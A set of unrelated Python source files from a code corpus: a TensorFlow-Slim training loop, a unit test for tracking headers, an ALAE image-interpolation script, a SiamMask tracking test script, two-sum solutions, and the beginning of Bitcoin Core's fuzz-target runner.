return tf.constant(FLAGS.learning_rate, name='fixed_learning_rate')
elif FLAGS.learning_rate_decay_type == 'polynomial':
return tf.train.polynomial_decay(FLAGS.learning_rate,
global_step,
decay_steps,
FLAGS.end_learning_rate,
power=1.0,
cycle=False,
name='polynomial_decay_learning_rate')
else:
raise ValueError('learning_rate_decay_type [%s] was not recognized' %
FLAGS.learning_rate_decay_type)
def _configure_optimizer(learning_rate):
"""Configures the optimizer used for training.
Args:
learning_rate: A scalar or `Tensor` learning rate.
Returns:
An instance of an optimizer.
Raises:
ValueError: if FLAGS.optimizer is not recognized.
"""
if FLAGS.optimizer == 'adadelta':
optimizer = tf.train.AdadeltaOptimizer(
learning_rate,
rho=FLAGS.adadelta_rho,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'adagrad':
optimizer = tf.train.AdagradOptimizer(
learning_rate,
initial_accumulator_value=FLAGS.adagrad_initial_accumulator_value)
elif FLAGS.optimizer == 'adam':
optimizer = tf.train.AdamOptimizer(
learning_rate,
beta1=FLAGS.adam_beta1,
beta2=FLAGS.adam_beta2,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'ftrl':
optimizer = tf.train.FtrlOptimizer(
learning_rate,
learning_rate_power=FLAGS.ftrl_learning_rate_power,
initial_accumulator_value=FLAGS.ftrl_initial_accumulator_value,
l1_regularization_strength=FLAGS.ftrl_l1,
l2_regularization_strength=FLAGS.ftrl_l2)
elif FLAGS.optimizer == 'momentum':
optimizer = tf.train.MomentumOptimizer(
learning_rate,
momentum=FLAGS.momentum,
name='Momentum')
elif FLAGS.optimizer == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(
learning_rate,
decay=FLAGS.rmsprop_decay,
momentum=FLAGS.rmsprop_momentum,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
else:
raise ValueError('Optimizer [%s] was not recognized' % FLAGS.optimizer)
return optimizer
def _get_init_fn():
"""Returns a function run by the chief worker to warm-start the training.
Note that the init_fn is only run when initializing the model during the very
first global step.
Returns:
An init function run by the supervisor.
"""
if FLAGS.checkpoint_path is None:
return None
# Warn the user if a checkpoint exists in the train_dir. Then we'll be
# ignoring the checkpoint anyway.
if tf.train.latest_checkpoint(FLAGS.train_dir):
tf.logging.info(
'Ignoring --checkpoint_path because a checkpoint already exists in %s'
% FLAGS.train_dir)
return None
exclusions = []
if FLAGS.checkpoint_exclude_scopes:
exclusions = [scope.strip()
for scope in FLAGS.checkpoint_exclude_scopes.split(',')]
# TODO(sguada) variables.filter_variables()
variables_to_restore = []
for var in slim.get_model_variables():
for exclusion in exclusions:
if exclusion in var.op.name:
break
else:
variables_to_restore.append(var)
if tf.gfile.IsDirectory(FLAGS.checkpoint_path):
checkpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_path)
else:
checkpoint_path = FLAGS.checkpoint_path
tf.logging.info('Fine-tuning from %s' % checkpoint_path)
return slim.assign_from_checkpoint_fn(
checkpoint_path,
variables_to_restore,
ignore_missing_vars=FLAGS.ignore_missing_vars)
def _get_variables_to_train():
"""Returns a list of variables to train.
Returns:
A list of variables to train by the optimizer.
"""
if FLAGS.trainable_scopes is None:
return tf.trainable_variables()
else:
scopes = [scope.strip() for scope in FLAGS.trainable_scopes.split(',')]
variables_to_train = []
for var in tf.trainable_variables():
for scope in scopes:
if scope in var.op.name and var not in variables_to_train:
variables_to_train.append(var)
return variables_to_train
def main(_):
if not FLAGS.dataset_dir:
raise ValueError('You must supply the dataset directory with --dataset_dir')
tf.logging.set_verbosity(tf.logging.INFO)
with tf.Graph().as_default():
#######################
# Config model_deploy #
#######################
deploy_config = model_deploy.DeploymentConfig(
num_clones=FLAGS.num_clones,
clone_on_cpu=FLAGS.clone_on_cpu,
replica_id=FLAGS.task,
num_replicas=FLAGS.worker_replicas,
num_ps_tasks=FLAGS.num_ps_tasks)
# Create global_step
with tf.device(deploy_config.variables_device()):
global_step = tf.train.create_global_step()
######################
# Select the dataset #
######################
dataset = dataset_factory_fgvc.get_dataset(
FLAGS.dataset_name, FLAGS.dataset_split_name, FLAGS.dataset_dir)
######################
# Select the network #
######################
network_fn = nets_factory.get_network_fn(
FLAGS.model_name,
num_classes=(dataset.num_classes - FLAGS.labels_offset),
weight_decay=FLAGS.weight_decay,
is_training=True)
#####################################
# Select the preprocessing function #
#####################################
preprocessing_name = FLAGS.preprocessing_name or FLAGS.model_name
image_preprocessing_fn = preprocessing_factory.get_preprocessing(
preprocessing_name,
is_training=True)
##############################################################
# Create a dataset provider that loads data from the dataset #
##############################################################
with tf.device(deploy_config.inputs_device()):
provider = slim.dataset_data_provider.DatasetDataProvider(
dataset,
num_readers=FLAGS.num_readers,
common_queue_capacity=20 * FLAGS.batch_size,
common_queue_min=10 * FLAGS.batch_size)
[image, label] = provider.get(['image', 'label'])
label -= FLAGS.labels_offset
train_image_size = FLAGS.train_image_size or network_fn.default_image_size
image = image_preprocessing_fn(image, train_image_size, train_image_size)
images, labels = tf.train.batch(
[image, label],
batch_size=FLAGS.batch_size,
num_threads=FLAGS.num_preprocessing_threads,
capacity=5 * FLAGS.batch_size)
labels = slim.one_hot_encoding(
labels, dataset.num_classes - FLAGS.labels_offset)
batch_queue = slim.prefetch_queue.prefetch_queue(
[images, labels], capacity=2 * deploy_config.num_clones)
####################
# Define the model #
####################
def clone_fn(batch_queue):
"""Allows data parallelism by creating multiple clones of network_fn."""
images, labels = batch_queue.dequeue()
logits, end_points = network_fn(images)
#############################
# Specify the loss function #
#############################
if 'AuxLogits' in end_points:
tf.losses.softmax_cross_entropy(
labels, end_points['AuxLogits'],
label_smoothing=FLAGS.label_smoothing, weights=0.4,
scope='aux_loss')
tf.losses.softmax_cross_entropy(
labels, logits, label_smoothing=FLAGS.label_smoothing, weights=1.0)
return end_points
# Gather initial summaries.
summaries = set(tf.get_collection(tf.GraphKeys.SUMMARIES))
clones = model_deploy.create_clones(deploy_config, clone_fn, [batch_queue])
first_clone_scope = deploy_config.clone_scope(0)
# Gather update_ops from the first clone. These contain, for example,
# the updates for the batch_norm variables created by network_fn.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, first_clone_scope)
# # Add summaries for end_points.
# end_points = clones[0].outputs
# for end_point in end_points:
# x = end_points[end_point]
# summaries.add(tf.summary.histogram('activations/' + end_point, x))
# summaries.add(tf.summary.scalar('sparsity/' + end_point,
# tf.nn.zero_fraction(x)))
# Add summaries for losses.
for loss in tf.get_collection(tf.GraphKeys.LOSSES, first_clone_scope):
summaries.add(tf.summary.scalar('losses/%s' % loss.op.name, loss))
# # Add summaries for variables.
# for variable in slim.get_model_variables():
# summaries.add(tf.summary.histogram(variable.op.name, variable))
#################################
# Configure the moving averages #
#################################
if FLAGS.moving_average_decay:
moving_average_variables = slim.get_model_variables()
variable_averages = tf.train.ExponentialMovingAverage(
FLAGS.moving_average_decay, global_step)
else:
moving_average_variables, variable_averages = None, None
if FLAGS.quantize_delay >= 0:
tf.contrib.quantize.create_training_graph(
quant_delay=FLAGS.quantize_delay)
#########################################
# Configure the optimization procedure. #
#########################################
with tf.device(deploy_config.optimizer_device()):
learning_rate = _configure_learning_rate(dataset.num_samples, global_step)
optimizer = _configure_optimizer(learning_rate)
summaries.add(tf.summary.scalar('learning_rate', learning_rate))
if FLAGS.sync_replicas:
# If sync_replicas is enabled, the averaging will be done in the chief
# queue runner.
optimizer = tf.train.SyncReplicasOptimizer(
opt=optimizer,
replicas_to_aggregate=FLAGS.replicas_to_aggregate,
total_num_replicas=FLAGS.worker_replicas,
variable_averages=variable_averages,
variables_to_average=moving_average_variables)
elif FLAGS.moving_average_decay:
# Update ops executed locally by trainer.
update_ops.append(variable_averages.apply(moving_average_variables))
# Variables to train.
variables_to_train = _get_variables_to_train()
# and returns a train_tensor and summary_op
total_loss, clones_gradients = model_deploy.optimize_clones(
clones,
optimizer,
var_list=variables_to_train)
# Add total_loss to summary.
summaries.add(tf.summary.scalar('total_loss', total_loss))
# Add epoch number to summary.
summaries.add(tf.summary.scalar(
'epoch', global_step*FLAGS.batch_size/dataset.num_samples))
# Create gradient updates.
grad_updates = optimizer.apply_gradients(clones_gradients,
global_step=global_step)
update_ops.append(grad_updates)
update_op = tf.group(*update_ops)
with tf.control_dependencies([update_op]):
train_tensor = tf.identity(total_loss, name='train_op')
# Add the summaries from the first clone. These contain the summaries
# created by model_fn and either optimize_clones() or _gather_clone_loss().
summaries |= set(tf.get_collection(tf.GraphKeys.SUMMARIES,
first_clone_scope))
# Merge all summaries together.
summary_op = tf.summary.merge(list(summaries), name='summary_op')
# Allocate only as much GPU memory based on runtime allocations.
session_config = tf.ConfigProto()
session_config.gpu_options.allow_growth = True
###########################
# Kicks off the training. #
###########################
slim.learning.train(
train_tensor,
logdir=FLAGS.train_dir,
master=FLAGS.master,
is_chief=(FLAGS.task == 0),
init_fn=_get_init_fn(),
summary_op=summary_op,
number_of_steps=FLAGS.max_number_of_steps,
log_every_n_steps=FLAGS.log_every_n_steps,
save_summaries_secs=FLAGS.save_summaries_secs,
save_interval_secs=FLAGS.save_interval_secs,
sync_optimizer=optimizer if FLAGS.sync_replicas else None,
session_config=session_config)
if __name__ == '__main__':
tf.app.run()
|
the-stack_0_25892
|
from unittest import TestCase
from utilities import mdc
class TestMDC(TestCase):
def setUp(self):
self._clearMDC()
def tearDown(self):
self._clearMDC()
@staticmethod
def _clearMDC():
mdc.message_id.set(None)
mdc.correlation_id.set(None)
mdc.interaction_id.set(None)
mdc.inbound_message_id.set(None)
def test_build_tracking_header_with_all_values(self):
mdc.message_id.set('1')
mdc.correlation_id.set('2')
mdc.interaction_id.set('3')
mdc.inbound_message_id.set('4')
headers = mdc.build_tracking_headers()
self.assertEqual(len(headers.keys()), 4)
self.assertEqual(headers['Message-Id'], '1')
self.assertEqual(headers['Correlation-Id'], '2')
self.assertEqual(headers['Interaction-Id'], '3')
self.assertEqual(headers['Inbound-Message-Id'], '4')
def test_build_tracking_header_with_some_values(self):
mdc.message_id.set('1')
mdc.inbound_message_id.set('4')
headers = mdc.build_tracking_headers()
self.assertEqual(len(headers.keys()), 2)
self.assertEqual(headers['Message-Id'], '1')
self.assertEqual(headers['Inbound-Message-Id'], '4')
def test_build_tracking_header_with_no_values(self):
headers = mdc.build_tracking_headers()
self.assertIsNone(headers)
|
the-stack_0_25894
|
# Copyright 2019-2020 Stanislav Pidhorskyi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import torch.utils.data
from torchvision.utils import save_image
from net import *
from model import Model
from launcher import run
from checkpointer import Checkpointer
from dlutils.pytorch import count_parameters
from defaults import get_cfg_defaults
import lreq
from PIL import Image
lreq.use_implicit_lreq.set(True)
def place(canvas, image, x, y):
im_size = image.shape[2]
if len(image.shape) == 4:
image = image[0]
canvas[:, y: y + im_size, x: x + im_size] = image * 0.5 + 0.5
def save_sample(model, sample, i):
os.makedirs('results', exist_ok=True)
with torch.no_grad():
model.eval()
x_rec = model.generate(model.generator.layer_count - 1, 1, z=sample)
def save_pic(x_rec):
resultsample = x_rec * 0.5 + 0.5
resultsample = resultsample.cpu()
save_image(resultsample,
'sample_%i_lr.png' % i, nrow=16)
save_pic(x_rec)
def sample(cfg, logger):
torch.cuda.set_device(0)
model = Model(
startf=cfg.MODEL.START_CHANNEL_COUNT,
layer_count=cfg.MODEL.LAYER_COUNT,
maxf=cfg.MODEL.MAX_CHANNEL_COUNT,
latent_size=cfg.MODEL.LATENT_SPACE_SIZE,
truncation_psi=cfg.MODEL.TRUNCATIOM_PSI,
truncation_cutoff=cfg.MODEL.TRUNCATIOM_CUTOFF,
mapping_layers=cfg.MODEL.MAPPING_LAYERS,
channels=cfg.MODEL.CHANNELS,
generator=cfg.MODEL.GENERATOR,
encoder=cfg.MODEL.ENCODER)
model.cuda(0)
model.eval()
model.requires_grad_(False)
decoder = model.decoder
encoder = model.encoder
mapping_tl = model.mapping_d
mapping_fl = model.mapping_f
dlatent_avg = model.dlatent_avg
logger.info("Trainable parameters generator:")
count_parameters(decoder)
logger.info("Trainable parameters discriminator:")
count_parameters(encoder)
arguments = dict()
arguments["iteration"] = 0
model_dict = {
'discriminator_s': encoder,
'generator_s': decoder,
'mapping_tl_s': mapping_tl,
'mapping_fl_s': mapping_fl,
'dlatent_avg': dlatent_avg
}
checkpointer = Checkpointer(cfg,
model_dict,
{},
logger=logger,
save=False)
extra_checkpoint_data = checkpointer.load()
model.eval()
layer_count = cfg.MODEL.LAYER_COUNT
def encode(x):
Z, _ = model.encode(x, layer_count - 1, 1)
Z = Z.repeat(1, model.mapping_f.num_layers, 1)
return Z
def decode(x):
layer_idx = torch.arange(2 * cfg.MODEL.LAYER_COUNT)[np.newaxis, :, np.newaxis]
ones = torch.ones(layer_idx.shape, dtype=torch.float32)
coefs = torch.where(layer_idx < model.truncation_cutoff, ones, ones)
# x = torch.lerp(model.dlatent_avg.buff.data, x, coefs)
return model.decoder(x, layer_count - 1, 1, noise=True)
rnd = np.random.RandomState(4)
latents = rnd.randn(1, cfg.MODEL.LATENT_SPACE_SIZE)
path = cfg.DATASET.SAMPLES_PATH
im_size = 2 ** (cfg.MODEL.LAYER_COUNT + 1)
pathA = '00001.png'
pathB = '00022.png'
pathC = '00077.png'
pathD = '00016.png'
def open_image(filename):
img = np.asarray(Image.open(path + '/' + filename))
if img.shape[2] == 4:
img = img[:, :, :3]
im = img.transpose((2, 0, 1))
x = torch.tensor(np.asarray(im, dtype=np.float32), device='cpu', requires_grad=True).cuda() / 127.5 - 1.
if x.shape[0] == 4:
x = x[:3]
factor = x.shape[2] // im_size
if factor != 1:
x = torch.nn.functional.avg_pool2d(x[None, ...], factor, factor)[0]
assert x.shape[2] == im_size
_latents = encode(x[None, ...].cuda())
latents = _latents[0, 0]
return latents
def make(w):
with torch.no_grad():
w = w[None, None, ...].repeat(1, model.mapping_f.num_layers, 1)
x_rec = decode(w)
return x_rec
wa = open_image(pathA)
wb = open_image(pathB)
wc = open_image(pathC)
wd = open_image(pathD)
height = 7
width = 7
images = []
for i in range(height):
for j in range(width):
kv = i / (height - 1.0)
kh = j / (width - 1.0)
ka = (1.0 - kh) * (1.0 - kv)
kb = kh * (1.0 - kv)
kc = (1.0 - kh) * kv
kd = kh * kv
w = ka * wa + kb * wb + kc * wc + kd * wd
interpolated = make(w)
images.append(interpolated)
images = torch.cat(images)
save_image(images * 0.5 + 0.5, 'make_figures/output/%s/interpolations.png' % cfg.NAME, nrow=width)
save_image(images * 0.5 + 0.5, 'make_figures/output/%s/interpolations.jpg' % cfg.NAME, nrow=width)
if __name__ == "__main__":
gpu_count = 1
run(sample, get_cfg_defaults(), description='ALAE-interpolations', default_config='configs/ffhq.yaml',
world_size=gpu_count, write_log=False)
|
the-stack_0_25895
|
# --------------------------------------------------------
# SiamMask
# Licensed under The MIT License
# Written by Qiang Wang (wangqiang2015 at ia.ac.cn)
# --------------------------------------------------------
from __future__ import division
import argparse
import logging
import numpy as np
import cv2
from PIL import Image
from os import makedirs
from os.path import join, isdir, isfile
from utils.load_helper import load_pretrain
from utils.bbox_helper import get_axis_aligned_bbox, cxy_wh_2_rect
import torch
from torch.autograd import Variable
import torch.nn.functional as F
from utils.anchors import Anchors
from utils.tracker_config import TrackerConfig
from utils.config_helper import load_config
thrs = np.arange(0.3, 0.5, 0.05)
parser = argparse.ArgumentParser(description='Test SiamMask')
parser.add_argument('--arch', dest='arch', default='', choices=['Custom',],
help='architecture of pretrained model')
parser.add_argument('--config', dest='config', required=True, help='hyper-parameter for SiamMask')
parser.add_argument('--resume', default='', type=str, required=True,
metavar='PATH', help='path to latest checkpoint (default: none)')
parser.add_argument('--mask', action='store_true', help='whether use mask output')
parser.add_argument('--refine', action='store_true', help='whether use mask refine output')
parser.add_argument('-l', '--log', default="log_test.txt", type=str, help='log file')
parser.add_argument('-v', '--visualization', dest='visualization', action='store_true',
help='whether visualize result')
parser.add_argument('--save_mask', action='store_true', help='whether use save mask for davis')
parser.add_argument('--gt', action='store_true', help='whether use gt rect for davis (Oracle)')
parser.add_argument('--video', default='', type=str, help='test special video')
parser.add_argument('--cpu', action='store_true', help='cpu mode')
parser.add_argument('--debug', action='store_true', help='debug mode')
def to_torch(ndarray):
if type(ndarray).__module__ == 'numpy':
return torch.from_numpy(ndarray)
elif not torch.is_tensor(ndarray):
raise ValueError("Cannot convert {} to torch tensor"
.format(type(ndarray)))
return ndarray
def im_to_torch(img):
img = np.transpose(img, (2, 0, 1)) # C*H*W
img = to_torch(img).float()
return img
def get_subwindow_tracking(im, pos, model_sz, original_sz, avg_chans, out_mode='torch'):
if isinstance(pos, float):
pos = [pos, pos]
sz = original_sz
im_sz = im.shape
c = (original_sz + 1) / 2
context_xmin = round(pos[0] - c)
context_xmax = context_xmin + sz - 1
context_ymin = round(pos[1] - c)
context_ymax = context_ymin + sz - 1
left_pad = int(max(0., -context_xmin))
top_pad = int(max(0., -context_ymin))
right_pad = int(max(0., context_xmax - im_sz[1] + 1))
bottom_pad = int(max(0., context_ymax - im_sz[0] + 1))
context_xmin = context_xmin + left_pad
context_xmax = context_xmax + left_pad
context_ymin = context_ymin + top_pad
context_ymax = context_ymax + top_pad
# zzp: a more easy speed version
r, c, k = im.shape
if any([top_pad, bottom_pad, left_pad, right_pad]):
te_im = np.zeros((r + top_pad + bottom_pad, c + left_pad + right_pad, k), np.uint8)
te_im[top_pad:top_pad + r, left_pad:left_pad + c, :] = im
if top_pad:
te_im[0:top_pad, left_pad:left_pad + c, :] = avg_chans
if bottom_pad:
te_im[r + top_pad:, left_pad:left_pad + c, :] = avg_chans
if left_pad:
te_im[:, 0:left_pad, :] = avg_chans
if right_pad:
te_im[:, c + left_pad:, :] = avg_chans
im_patch_original = te_im[int(context_ymin):int(context_ymax + 1), int(context_xmin):int(context_xmax + 1), :]
else:
im_patch_original = im[int(context_ymin):int(context_ymax + 1), int(context_xmin):int(context_xmax + 1), :]
if not np.array_equal(model_sz, original_sz):
im_patch = cv2.resize(im_patch_original, (model_sz, model_sz))
else:
im_patch = im_patch_original
# cv2.imshow('crop', im_patch)
# cv2.waitKey(0)
return im_to_torch(im_patch) if out_mode in 'torch' else im_patch
def generate_anchor(cfg, score_size):
anchors = Anchors(cfg)
anchor = anchors.anchors
x1, y1, x2, y2 = anchor[:, 0], anchor[:, 1], anchor[:, 2], anchor[:, 3]
anchor = np.stack([(x1+x2)*0.5, (y1+y2)*0.5, x2-x1, y2-y1], 1)
total_stride = anchors.stride
anchor_num = anchor.shape[0]
anchor = np.tile(anchor, score_size * score_size).reshape((-1, 4))
ori = - (score_size // 2) * total_stride
xx, yy = np.meshgrid([ori + total_stride * dx for dx in range(score_size)],
[ori + total_stride * dy for dy in range(score_size)])
xx, yy = np.tile(xx.flatten(), (anchor_num, 1)).flatten(), \
np.tile(yy.flatten(), (anchor_num, 1)).flatten()
anchor[:, 0], anchor[:, 1] = xx.astype(np.float32), yy.astype(np.float32)
return anchor
def siamese_init(im, target_pos, target_sz, model, hp=None, device='cpu'):
state = dict()
state['im_h'] = im.shape[0]
state['im_w'] = im.shape[1]
p = TrackerConfig()
p.update(hp, model.anchors)
p.renew()
net = model
p.scales = model.anchors['scales']
p.ratios = model.anchors['ratios']
p.anchor_num = model.anchor_num
p.anchor = generate_anchor(model.anchors, p.score_size)
avg_chans = np.mean(im, axis=(0, 1))
wc_z = target_sz[0] + p.context_amount * sum(target_sz)
hc_z = target_sz[1] + p.context_amount * sum(target_sz)
s_z = round(np.sqrt(wc_z * hc_z))
# initialize the exemplar
z_crop = get_subwindow_tracking(im, target_pos, p.exemplar_size, s_z, avg_chans)
z = Variable(z_crop.unsqueeze(0))
net.template(z.to(device))
if p.windowing == 'cosine':
window = np.outer(np.hanning(p.score_size), np.hanning(p.score_size))
elif p.windowing == 'uniform':
window = np.ones((p.score_size, p.score_size))
window = np.tile(window.flatten(), p.anchor_num)
state['p'] = p
state['net'] = net
state['avg_chans'] = avg_chans
state['window'] = window
state['target_pos'] = target_pos
state['target_sz'] = target_sz
return state
def siamese_track(state, im, mask_enable=False, refine_enable=False, device='cpu', debug=False):
p = state['p']
net = state['net']
avg_chans = state['avg_chans']
window = state['window']
target_pos = state['target_pos']
target_sz = state['target_sz']
wc_x = target_sz[1] + p.context_amount * sum(target_sz)
hc_x = target_sz[0] + p.context_amount * sum(target_sz)
s_x = np.sqrt(wc_x * hc_x)
scale_x = p.exemplar_size / s_x
d_search = (p.instance_size - p.exemplar_size) / 2
pad = d_search / scale_x
s_x = s_x + 2 * pad
crop_box = [target_pos[0] - round(s_x) / 2, target_pos[1] - round(s_x) / 2, round(s_x), round(s_x)]
if debug:
im_debug = im.copy()
crop_box_int = np.int0(crop_box)
cv2.rectangle(im_debug, (crop_box_int[0], crop_box_int[1]),
(crop_box_int[0] + crop_box_int[2], crop_box_int[1] + crop_box_int[3]), (255, 0, 0), 2)
cv2.imshow('search area', im_debug)
cv2.waitKey(0)
# extract scaled crops for search region x at previous target position
x_crop = Variable(get_subwindow_tracking(im, target_pos, p.instance_size, round(s_x), avg_chans).unsqueeze(0))
if mask_enable:
score, delta, mask = net.track_mask(x_crop.to(device))
else:
score, delta = net.track(x_crop.to(device))
delta = delta.permute(1, 2, 3, 0).contiguous().view(4, -1).data.cpu().numpy()
score = F.softmax(score.permute(1, 2, 3, 0).contiguous().view(2, -1).permute(1, 0), dim=1).data[:,
1].cpu().numpy()
delta[0, :] = delta[0, :] * p.anchor[:, 2] + p.anchor[:, 0]
delta[1, :] = delta[1, :] * p.anchor[:, 3] + p.anchor[:, 1]
delta[2, :] = np.exp(delta[2, :]) * p.anchor[:, 2]
delta[3, :] = np.exp(delta[3, :]) * p.anchor[:, 3]
def change(r):
return np.maximum(r, 1. / r)
def sz(w, h):
pad = (w + h) * 0.5
sz2 = (w + pad) * (h + pad)
return np.sqrt(sz2)
def sz_wh(wh):
pad = (wh[0] + wh[1]) * 0.5
sz2 = (wh[0] + pad) * (wh[1] + pad)
return np.sqrt(sz2)
# size penalty
target_sz_in_crop = target_sz*scale_x
s_c = change(sz(delta[2, :], delta[3, :]) / (sz_wh(target_sz_in_crop))) # scale penalty
r_c = change((target_sz_in_crop[0] / target_sz_in_crop[1]) / (delta[2, :] / delta[3, :])) # ratio penalty
penalty = np.exp(-(r_c * s_c - 1) * p.penalty_k)
pscore = penalty * score
# cos window (motion model)
pscore = pscore * (1 - p.window_influence) + window * p.window_influence
best_pscore_id = np.argmax(pscore)
pred_in_crop = delta[:, best_pscore_id] / scale_x
lr = penalty[best_pscore_id] * score[best_pscore_id] * p.lr # lr for OTB
res_x = pred_in_crop[0] + target_pos[0]
res_y = pred_in_crop[1] + target_pos[1]
res_w = target_sz[0] * (1 - lr) + pred_in_crop[2] * lr
res_h = target_sz[1] * (1 - lr) + pred_in_crop[3] * lr
target_pos = np.array([res_x, res_y])
target_sz = np.array([res_w, res_h])
# for Mask Branch
if mask_enable:
best_pscore_id_mask = np.unravel_index(best_pscore_id, (5, p.score_size, p.score_size))
delta_x, delta_y = best_pscore_id_mask[2], best_pscore_id_mask[1]
if refine_enable:
mask = net.track_refine((delta_y, delta_x)).to(device).sigmoid().squeeze().view(
p.out_size, p.out_size).cpu().data.numpy()
else:
mask = mask[0, :, delta_y, delta_x].sigmoid(). \
squeeze().view(p.out_size, p.out_size).cpu().data.numpy()
def crop_back(image, bbox, out_sz, padding=-1):
a = (out_sz[0] - 1) / bbox[2]
b = (out_sz[1] - 1) / bbox[3]
c = -a * bbox[0]
d = -b * bbox[1]
mapping = np.array([[a, 0, c],
[0, b, d]]).astype(np.float)
crop = cv2.warpAffine(image, mapping, (out_sz[0], out_sz[1]),
flags=cv2.INTER_LINEAR,
borderMode=cv2.BORDER_CONSTANT,
borderValue=padding)
return crop
s = crop_box[2] / p.instance_size
sub_box = [crop_box[0] + (delta_x - p.base_size / 2) * p.total_stride * s,
crop_box[1] + (delta_y - p.base_size / 2) * p.total_stride * s,
s * p.exemplar_size, s * p.exemplar_size]
s = p.out_size / sub_box[2]
back_box = [-sub_box[0] * s, -sub_box[1] * s, state['im_w'] * s, state['im_h'] * s]
mask_in_img = crop_back(mask, back_box, (state['im_w'], state['im_h']))
target_mask = (mask_in_img > p.seg_thr).astype(np.uint8)
if cv2.__version__[-5] == '4':
contours, _ = cv2.findContours(target_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
else:
_, contours, _ = cv2.findContours(target_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
cnt_area = [cv2.contourArea(cnt) for cnt in contours]
if len(contours) != 0 and np.max(cnt_area) > 100:
contour = contours[np.argmax(cnt_area)] # use max area polygon
polygon = contour.reshape(-1, 2)
# pbox = cv2.boundingRect(polygon) # Min Max Rectangle
prbox = cv2.boxPoints(cv2.minAreaRect(polygon)) # Rotated Rectangle
# box_in_img = pbox
rbox_in_img = prbox
else: # empty mask
location = cxy_wh_2_rect(target_pos, target_sz)
rbox_in_img = np.array([[location[0], location[1]],
[location[0] + location[2], location[1]],
[location[0] + location[2], location[1] + location[3]],
[location[0], location[1] + location[3]]])
target_pos[0] = max(0, min(state['im_w'], target_pos[0]))
target_pos[1] = max(0, min(state['im_h'], target_pos[1]))
target_sz[0] = max(10, min(state['im_w'], target_sz[0]))
target_sz[1] = max(10, min(state['im_h'], target_sz[1]))
state['target_pos'] = target_pos
state['target_sz'] = target_sz
state['score'] = score[best_pscore_id]
state['mask'] = mask_in_img if mask_enable else []
state['ploygon'] = rbox_in_img if mask_enable else []
return state
|
the-stack_0_25896
|
'''
Question Link: https://leetcode.com/problems/two-sum/
Solution Explanation: https://www.code-recipe.com/post/two-sum
HashMap Method:
'''
class Solution(object):
# Brute Force Solution
def twoSumBF(self, nums, target):
for bottom, bottomVal in enumerate(nums):
for top, topVal in enumerate(nums[bottom+1:]):
sum = bottomVal + topVal
if(sum == target):
return [bottom, top + bottom+1]
# HashMap - 1
def twoSumHM(self, nums, target):
hashMap = {}
for id, number in enumerate(nums):
hashMap[number] = id
keys = hashMap.keys()
for id,number in enumerate(nums):
if(target-number in keys):
if(hashMap[target-number] != id):
return [id, hashMap[target-number]]
# HashMap - Best
def twoSumHM2(self, nums: list, target:int) -> list:
prevMap = {}
for id, number in enumerate(nums):
diff = target - number
if diff in prevMap:
return [prevMap[diff], id]
prevMap[number] = id
return
nums = [2,5,5,11]
target = 10
SolutionObj = Solution()
print(SolutionObj.twoSumHM2(nums,target))
|
the-stack_0_25898
|
#!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run fuzz test targets.
"""
import argparse
import configparser
import os
import sys
import subprocess
import logging
# Fuzzers known to lack a seed corpus in https://github.com/bitcoin-core/qa-assets/tree/master/fuzz_seed_corpus
FUZZERS_MISSING_CORPORA = [
"addr_info_deserialize",
"asmap",
"base_encode_decode",
"block",
"block_file_info_deserialize",
"block_filter_deserialize",
"block_header_and_short_txids_deserialize",
"bloom_filter",
"decode_tx",
"fee_rate_deserialize",
"flat_file_pos_deserialize",
"hex",
"integer",
"key_origin_info_deserialize",
"merkle_block_deserialize",
"out_point_deserialize",
"p2p_transport_deserializer",
"parse_hd_keypath",
"parse_numbers",
"parse_script",
"parse_univalue",
"partial_merkle_tree_deserialize",
"partially_signed_transaction_deserialize",
"prefilled_transaction_deserialize",
"psbt_input_deserialize",
"psbt_output_deserialize",
"pub_key_deserialize",
"rolling_bloom_filter",
"script_deserialize",
"strprintf",
"sub_net_deserialize",
"tx_in",
"tx_in_deserialize",
"tx_out",
]
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
"-l",
"--loglevel",
dest="loglevel",
default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console.",
)
parser.add_argument(
'--export_coverage',
action='store_true',
help='If true, export coverage information to files in the seed corpus',
)
parser.add_argument(
'--valgrind',
action='store_true',
help='If true, run fuzzing binaries under the valgrind memory error detector',
)
parser.add_argument(
'-x',
'--exclude',
help="A comma-separated list of targets to exclude",
)
parser.add_argument(
'seed_dir',
help='The seed corpus to run on (must contain subfolders for each fuzz target).',
)
parser.add_argument(
'target',
nargs='*',
help='The target(s) to run. Default is to run all targets.',
)
args = parser.parse_args()
# Set up logging
logging.basicConfig(
format='%(message)s',
level=int(args.loglevel) if args.loglevel.isdigit() else args.loglevel.upper(),
)
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
config.read_file(open(configfile, encoding="utf8"))
if not config["components"].getboolean("ENABLE_FUZZ"):
logging.error("Must have fuzz targets built")
sys.exit(1)
# Build list of tests
test_list_all = parse_test_list(makefile=os.path.join(config["environment"]["SRCDIR"], 'src', 'Makefile.test.include'))
if not test_list_all:
logging.error("No fuzz targets found")
sys.exit(1)
logging.debug("{} fuzz target(s) found: {}".format(len(test_list_all), " ".join(sorted(test_list_all))))
args.target = args.target or test_list_all # By default run all
test_list_error = list(set(args.target).difference(set(test_list_all)))
if test_list_error:
logging.error("Unknown fuzz targets selected: {}".format(test_list_error))
